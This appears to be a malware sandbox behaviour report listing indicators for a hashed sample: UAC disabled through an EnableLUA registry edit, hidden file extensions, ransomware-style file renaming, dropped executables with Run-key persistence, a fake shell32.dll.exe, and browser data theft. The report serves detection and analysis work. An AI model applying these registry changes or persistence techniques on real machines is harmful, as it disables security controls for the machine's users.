Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A

Renames multiple (86) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\ProgramData\xGYksgIk\mucsYUUU.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gwooEwMc.exe = "C:\\Users\\Admin\\lKwcEkEY\\gwooEwMc.exe" C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\mucsYUUU.exe = "C:\\ProgramData\\xGYksgIk\\mucsYUUU.exe" C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gwooEwMc.exe = "C:\\Users\\Admin\\lKwcEkEY\\gwooEwMc.exe" C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\mucsYUUU.exe = "C:\\ProgramData\\xGYksgIk\\mucsYUUU.exe" C:\ProgramData\xGYksgIk\mucsYUUU.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\shell32.dll.exe C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
File opened for modification C:\Windows\SysWOW64\shell32.dll.exe C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
